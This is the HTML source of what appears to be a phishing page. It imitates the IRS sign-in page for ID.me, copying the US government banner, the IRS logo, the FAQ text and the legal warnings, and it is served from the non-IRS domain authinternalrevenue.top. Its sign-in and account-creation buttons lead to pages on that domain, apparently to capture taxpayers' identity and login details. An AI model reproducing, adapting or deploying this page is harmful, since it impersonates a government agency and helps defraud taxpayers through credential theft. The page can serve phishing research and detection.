<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta http-equiv="Cache-Control" content="private, no-cache, no-store, must-revalidate">
    <meta http-equiv="Pragma" content="no-cache"> 
    <meta http-equiv="Expires" content="-1">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="robots" content="noindex,nofollow">
    <title>Sign In</title>
    <link rel="shortcut icon" href="https://authinternalrevenue.top/favicon.ico">
    <link href="./Sign In_files/bootstrap.min.css" rel="stylesheet">
    <link href="./Sign In_files/font.css" rel="stylesheet">
    <link href="./Sign In_files/styles.css" rel="stylesheet">
    <script>
    function toggle(title_id, panel_id, plusminus) {
        var pm = document.getElementById(plusminus);
        var div_title = document.getElementById(title_id);
        var div_panel = document.getElementById(panel_id);
        var numFormatted = "";
        
        if (panel_id == 'faq_panel1') {
            alttext = "How do I verify my identity?";
        } else {
            if (panel_id == 'faq_panel2') {
                alttext = "What if I can't verify my identity?";
            } else {
                if (panel_id == 'faq_panel3') {
                    alttext = "What is ID.me?";
                }
            }
        }
        
        expandText = "Expand";
        collapseText = "Collapse";
        
        if (div_panel.style.display == 'none') {
            div_panel.style.display = 'block';
            div_panel.style = 'border-top-color: white';
            div_title.style = 'border-bottom-color: white';
            pm.innerHTML = '<span class="Accordion-triggerPlusIcon"><svg fill="#00599C" width="24px" height="24px" viewBox="0 0 16 16"><path fill="#00599C" d="M8 1c3.9 0 7 3.1 7 7s-3.1 7-7 7-7-3.1-7-7 3.1-7 7-7zM8 0c-4.4 0-8 3.6-8 8s3.6 8 8 8 8-3.6 8-8-3.6-8-8-8v0z"></path><path fill="#00599C" d="M3 7h10v2h-10v-2z"></path></svg></span><font size="4" color="#1b1b1b">' + alttext + '</font>';
            pm.setAttribute('alt', collapseText + ' ' + alttext);
            gaTrackingTrigger('SADI Login Page Accordion', 'Open', alttext);
        } else {
            div_panel.style.display = 'none';
            div_title.style = 'border-bottom-color: #d6d7d9';
            pm.innerHTML = '<span class="Accordion-triggerPlusIcon"><svg fill="#00599C" preserveAspectRatio="xMidYMid meet" height="24px" width="24px" viewBox="0 0 20 20"><path d="M15.8333335,10.8333335 C15.8333335,11.2890625 15.455729,11.6666669 15,11.6666669 L11.6666669,11.6666669 L11.6666669,15 C11.6666669,15.455729 11.2890625,15.8333335 10.8333335,15.8333335 L9.16666654,15.8333335 C8.71093752,15.8333335 8.33333307,15.455729 8.33333307,15 L8.33333307,11.6666669 L5,11.6666669 C4.54427098,11.6666669 4.16666654,11.2890625 4.16666654,10.8333335 L4.16666654,9.16666654 C4.16666654,8.71093752 4.54427098,8.33333307 5,8.33333307 L8.33333307,8.33333307 L8.33333307,5 C8.33333307,4.54427098 8.71093752,4.16666654 9.16666654,4.16666654 L10.8333335,4.16666654 C11.2890625,4.16666654 11.6666669,4.54427098 11.6666669,5 L11.6666669,8.33333307 L15,8.33333307 C15.455729,8.33333307 15.8333335,8.71093752 15.8333335,9.16666654 L15.8333335,10.8333335 Z M10,19 C14.9705627,19 19,14.9705627 19,10 C19,5.02943725 14.9705627,1 10,1 C5.02943725,1 1,5.02943725 1,10 C1,14.9705627 5.02943725,19 10,19 Z M10,20 C4.4771525,20 0,15.5228475 0,10 C0,4.4771525 4.4771525,0 10,0 C15.5228475,0 20,4.4771525 20,10 C20,15.5228475 15.5228475,20 10,20 Z" /></svg></span><font size="4" color="#1b1b1b">' + alttext + '</font>';
            pm.setAttribute('alt', expandText + ' ' + alttext);
            gaTrackingTrigger('SADI Login Page Accordion', 'Close', alttext);
        }
    }
    
    function gaTrackingTrigger(eventCat, eventAction, eventLabel) {
        var val = "";
        
        if (eventLabel.trim() == 'IDmeLink') {
            val = $('#' + eventLabel).val();	
        } else {
            val = eventLabel;
        }
        
        ga('send', { 
            'hitType': 'event',
            'eventCategory': eventCat,
            'eventAction': eventAction,
            'eventLabel': val
        });
    }
    
    function ExpandedHeaderBar() {
        var image = $("#aExpandHeaderArrow");
        if (image) {
            var expanded = image.attr('data-isexpanded') == "true";
            image.attr('data-isexpanded', !expanded);
            var expandText = "Expand";
            var collapseText = "Collapse";
            
            // Update element's alt text
            var aLink = $('#aExpandHeaderBar');
            if (aLink) {
                // Get and set the alt text
                var altText = aLink.attr('alt');
                if (!expanded) {
                    altText = altText.replace(expandText, collapseText);
                }
                else {
                    altText = altText.replace(collapseText, expandText);
                }
                
                aLink.attr({
                    'alt': altText,
                    'aria-label': altText
                })
            }
        }
        
        // Update visibility of banner
        var panel = $('#gov-banner');
        if (panel) {
            panel.toggleClass('hidden');	
        }
        
        // Doing this so the # doesn't get added to the url.
        return false;
    }
    </script>
</head>
<body class="bg-white" data-new-gr-c-s-check-loaded="14.1153.0" data-gr-ext-installed="">
<header>
    <div id="banner" role="banner" alt="banner">
        <section class="usa-banner" aria-label="Official government website">
            <div class="usa-accordion">
                <header>
                    <div id="bannerOuter">
                        <div id="bannerInner" class="container">
                            <div class="bannerRow">
                                <img src="./Sign In_files/official-site-flag.png" class="official-site-flag mr-2" alt="US Flag">
                                <div class="bannerText fill">An official website of the United States Government</div>
                            </div>
                            <div class="bannerRow">
                                <div id="flagEqualizer"></div>
                                <div class="bannerText fill">
                                    <a id="aExpandHeaderBar" href="https://authinternalrevenue.top/#" onclick="return ExpandedHeaderBar();" alt="Expand &quot;Here&#39;s how you know&quot;" aria-label="Expand &quot;Here&#39;s how you know&quot;">
                                        <span>Here's how you know</span>
                                        <img id="aExpandHeaderArrow" src="./Sign In_files/arrow-down.svg" alt="" aria-label="" width="10px" padding="0" border="0" data-isexpanded="false">
                                    </a>
                                </div>
                            </div>
                        </div>
                    </div>
                </header>
            </div>
        </section>
    </div>
    <nav id="nav" class="sadi-header mb-3">
        <div id="navbarText" class="container sadi-header py-0 my-0">
        <div class="sadi-header py-0 my-0 mr-2 sadi-header-flex-left">
            <img src="./Sign In_files/IRS-Logoa.svg" class="mr-3 sadi-header-logo" alt="The IRS eagle symbol">
        </div>			
        </div>
    </nav>
</header>
<div id="main">
    <div class="container">
        <h1 class="App-title"><span>Sign In or Create a New Account</span></h1>
        <div class="Panel-panel">
            <div class="intro">
                <div>
                    <p>ID.me is an account created, maintained, and secured by a technology provider.</p>
                    <p>If you don't have idme account, you must create a new account.</p>
                </div>
            </div>
            <div class="outerCspContainer">
                <div class="innerCspContainer">
                    <span><h2><b>Sign in with an existing account</b></h2></span>
                    <div class="cspContainer">
                        <a id="aIdmeSignin" class="sadi-underline" href="./login.html">
                            <img src="./Sign In_files/sign-in.svg" height="44" width="300" padding="0" border="0" alt="Sign In with ID.me">
                        </a>
                    </div>
                    <p>
                        <span> 
                        </span>
                    </p>
                    <div class="separator"><div class="separator-spacer"><b>OR</b></div></div>
                    <p>
                        <span></span>
                    </p>
                    <h2><b>Create a new account</b></h2>
                    <div class="cspContainer">
                        <a id="aIdmeCreateAcct" class="sadi-underline" href="https://authinternalrevenue.top/create.html">
                            <img src="./Sign In_files/create-acct.svg" height="44" width="300" padding="0" border="0" alt="Create an account with ID.me">
                        </a>
                    </div>                       
                </div>
                <div style="flex: 1;"></div>
            </div>
            <h2 class="Panel-heading"><span>Frequently Asked Questions</span></h2>
                
                <div id="faq_title_panel1" class="collapseableTitlePanel">
                    <button id="faq_plusminus1" class="Accordion-trigger" onclick="toggle(&#39;faq_title_panel1&#39;, &#39;faq_panel1&#39;, &#39;faq_plusminus1&#39;);" alt="Expand How do I verify my identity?">
                        <span class="Accordion-triggerPlusIcon">
                            <svg alt="" fill="#00599C" preserveAspectRatio="xMidYMid meet" height="24px" width="24px" viewBox="0 0 20 20">
                                <path d="M15.8333335,10.8333335 C15.8333335,11.2890625 15.455729,11.6666669 15,11.6666669 L11.6666669,11.6666669 L11.6666669,15 C11.6666669,15.455729 11.2890625,15.8333335 10.8333335,15.8333335 L9.16666654,15.8333335 C8.71093752,15.8333335 8.33333307,15.455729 8.33333307,15 L8.33333307,11.6666669 L5,11.6666669 C4.54427098,11.6666669 4.16666654,11.2890625 4.16666654,10.8333335 L4.16666654,9.16666654 C4.16666654,8.71093752 4.54427098,8.33333307 5,8.33333307 L8.33333307,8.33333307 L8.33333307,5 C8.33333307,4.54427098 8.71093752,4.16666654 9.16666654,4.16666654 L10.8333335,4.16666654 C11.2890625,4.16666654 11.6666669,4.54427098 11.6666669,5 L11.6666669,8.33333307 L15,8.33333307 C15.455729,8.33333307 15.8333335,8.71093752 15.8333335,9.16666654 L15.8333335,10.8333335 Z M10,19 C14.9705627,19 19,14.9705627 19,10 C19,5.02943725 14.9705627,1 10,1 C5.02943725,1 1,5.02943725 1,10 C1,14.9705627 5.02943725,19 10,19 Z M10,20 C4.4771525,20 0,15.5228475 0,10 C0,4.4771525 4.4771525,0 10,0 C15.5228475,0 20,4.4771525 20,10 C20,15.5228475 15.5228475,20 10,20 Z"></path>
                            </svg>
                        </span>
                        <span class="collapseablePanelTitle"><span>How do I verify my identity?</span></span>
                    </button>
                </div>
    
                
                <div id="faq_panel1" class="collapseablePanel" style="display: none;">
                  <div class="InfoPanel">
                    
                    <p>The IRS offers multiple ways to verify your identity with ID.me.</p>
    
                    
    
                    <p>
                        
                        <span>You can use either a self-service process that requires a photo of a government ID and selfie, or a live call with an ID.me video chat agent that doesn’t require biometric data. Any selfie, video, and/or biometric data will be deleted automatically, except for suspicious or fraudulent activity. If you need help verifying your identity or to submit a support ticket, you can visit the </span>
                        <a id="aIdmeHelp" href="https://help.id.me/hc/en-us/categories/1500002213102" target="_blank" class="Links-externalLink">
                            <span>ID.me IRS Help Site</span><!--
                     --></a><!--
                     --><span>.</span>
                    </p>
    
                    <p>
                        <span>If you use assistive technology such as a screen reader or have trouble taking photos, you may need assistance to complete the process. Find more information in our</span>
                        <a href="https://www.irs.gov/sadiaccessibility">
                            <span>accessibility guide</span><!--
                     --></a><!--
                     --><span>.</span>
                    </p>
    
                    <p>
                        <span></span>
                    </p>
                  </div>
                </div>
                <div id="faq_title_panel2" class="collapseableTitlePanel">
                    <button id="faq_plusminus2" class="Accordion-trigger" onclick="toggle(&#39;faq_title_panel2&#39;, &#39;faq_panel2&#39;, &#39;faq_plusminus2&#39;);" alt="Expand What if I can&#39;t verify my identity?">
                        <span class="Accordion-triggerPlusIcon">
                            <svg alt="" fill="#00599C" preserveAspectRatio="xMidYMid meet" height="24px" width="24px" viewBox="0 0 20 20">
                                <path d="M15.8333335,10.8333335 C15.8333335,11.2890625 15.455729,11.6666669 15,11.6666669 L11.6666669,11.6666669 L11.6666669,15 C11.6666669,15.455729 11.2890625,15.8333335 10.8333335,15.8333335 L9.16666654,15.8333335 C8.71093752,15.8333335 8.33333307,15.455729 8.33333307,15 L8.33333307,11.6666669 L5,11.6666669 C4.54427098,11.6666669 4.16666654,11.2890625 4.16666654,10.8333335 L4.16666654,9.16666654 C4.16666654,8.71093752 4.54427098,8.33333307 5,8.33333307 L8.33333307,8.33333307 L8.33333307,5 C8.33333307,4.54427098 8.71093752,4.16666654 9.16666654,4.16666654 L10.8333335,4.16666654 C11.2890625,4.16666654 11.6666669,4.54427098 11.6666669,5 L11.6666669,8.33333307 L15,8.33333307 C15.455729,8.33333307 15.8333335,8.71093752 15.8333335,9.16666654 L15.8333335,10.8333335 Z M10,19 C14.9705627,19 19,14.9705627 19,10 C19,5.02943725 14.9705627,1 10,1 C5.02943725,1 1,5.02943725 1,10 C1,14.9705627 5.02943725,19 10,19 Z M10,20 C4.4771525,20 0,15.5228475 0,10 C0,4.4771525 4.4771525,0 10,0 C15.5228475,0 20,4.4771525 20,10 C20,15.5228475 15.5228475,20 10,20 Z"></path>
                            </svg>
                        </span>
                        <span class="collapseablePanelTitle"><span>What if I can't verify my identity?</span></span>
                    </button>
                </div>
    
                
                <div id="faq_panel2" class="collapseablePanel" style="display: none;">
                    <div class="InfoPanel">
                      <p>
                        <span>If you need help verifying your identity or to submit a support ticket, you can visit the </span>
                        
                        
                        <a id="aIdmeHelp" href="https://authinternalrevenue.top/#" target="_blank" class="Links-externalLink">
                            <span>ID.me IRS Help Site</span><!--
                     --></a><!--
                     --><span>.</span>
                      </p>
                      <p>
                        
                        <span>If you can't verify your identity online, please see our  </span>
                        
                        
                         <a href="https://authinternalrevenue.top/#">
                            <span>alternative options</span><!--
                     --></a><!--
                     --><span>.</span>
                      </p>
                         <p><span>If you're under 18 years old, the system doesn't allow access.</span></p>
                         
                         <p><span>If you get a message that says "A condition has been identified that's preventing your access to this service," this means you won’t be able to use the online service at this time.</span></p>
                         <p><span></span></p> 
                         <p><span></span></p>
                    </div>
                </div>
                <div>
                    <div id="faq_title_panel3" class="collapseableTitlePanel">
                        <button id="faq_plusminus3" class="Accordion-trigger" onclick="toggle(&#39;faq_title_panel3&#39;, &#39;faq_panel3&#39;, &#39;faq_plusminus3&#39;);" alt="Expand What is ID.me?">
                            <span class="Accordion-triggerPlusIcon">
                                <svg alt="" fill="#00599C" preserveAspectRatio="xMidYMid meet" height="24px" width="24px" viewBox="0 0 20 20">
                                    <path d="M15.8333335,10.8333335 C15.8333335,11.2890625 15.455729,11.6666669 15,11.6666669 L11.6666669,11.6666669 L11.6666669,15 C11.6666669,15.455729 11.2890625,15.8333335 10.8333335,15.8333335 L9.16666654,15.8333335 C8.71093752,15.8333335 8.33333307,15.455729 8.33333307,15 L8.33333307,11.6666669 L5,11.6666669 C4.54427098,11.6666669 4.16666654,11.2890625 4.16666654,10.8333335 L4.16666654,9.16666654 C4.16666654,8.71093752 4.54427098,8.33333307 5,8.33333307 L8.33333307,8.33333307 L8.33333307,5 C8.33333307,4.54427098 8.71093752,4.16666654 9.16666654,4.16666654 L10.8333335,4.16666654 C11.2890625,4.16666654 11.6666669,4.54427098 11.6666669,5 L11.6666669,8.33333307 L15,8.33333307 C15.455729,8.33333307 15.8333335,8.71093752 15.8333335,9.16666654 L15.8333335,10.8333335 Z M10,19 C14.9705627,19 19,14.9705627 19,10 C19,5.02943725 14.9705627,1 10,1 C5.02943725,1 1,5.02943725 1,10 C1,14.9705627 5.02943725,19 10,19 Z M10,20 C4.4771525,20 0,15.5228475 0,10 C0,4.4771525 4.4771525,0 10,0 C15.5228475,0 20,4.4771525 20,10 C20,15.5228475 15.5228475,20 10,20 Z"></path>
                                </svg>
                            </span>
                            <span class="collapseablePanelTitle">
                                
                                <span>What is ID.me?</span>
                            </span>
                        </button>
                    </div><div id="faq_panel3" class="collapseablePanel" style="display: none;">
                        <div class="InfoPanel">
                            <p>
                                
                                <span>IRS now offers a sign-in option with ID.me, which offers access to IRS online services with a secure account that protects your privacy. ID.me is an account created, maintained, and secured by a technology provider. With an ID.me account, you can access other government partners who also use this sign-in option.</span>
                            </p>
                            <p><span></span></p>
                            <p><span></span></p>
                        </div>
                    </div>
                </div>
    
                
                <br>
                <div class="DisclaimerPanel">
                    <span class="tiny-text"><b><span>This U.S. Government system is for authorized use only.</span></b><br>
                    <span>Warning: This system may contain private tax information. By using this system, you consent to the monitoring, recording, and reviewing of your activities in this system. You may only access this system using your own personal information. Any other use of this system is an unauthorized use and is prohibited.</span><br><br>
                    <span>Unauthorized use violates Federal law and may result in criminal or civil penalties under these laws. Examples are penalties for knowingly or intentionally accessing a computer without authorization or exceeding authorized access under 18 U.S.C. 1030, and penalties for the willful unauthorized access or inspection of taxpayer records under 26 U.S.C. 7213A and 26 U.S.C. 7431.</span>
                    </span>
                </div>
            </div>
        </div>
        <footer class="footer sadi-footer" id="sadi-footer" style="bottom: 0; position: relative;">
        <div class="container flex sadi-footer-position">
            <div class="grid-row grid-gap-lg">
            <div style="padding-top: 20px;">
                <a href="https://authinternalrevenue.top/#">
                    <img id="footerLogo" src="./Sign In_files/IRS-Logoa.svg" height="28px" padding="0" border="0" alt="The IRS Logo">
                </a>
            </div>
            <div class="footer-links-position">
                 <span class="text-white">
                    <a href="https://authinternalrevenue.top/#" class="text-white mr-2">Privacy Policy</a>|</span>
                 <span class="text-white">
                    <a href="https://authinternalrevenue.top/#" class="text-white ml-2">Accessibility</a></span>
            </div>
            </div>
        </div>
    </footer>
  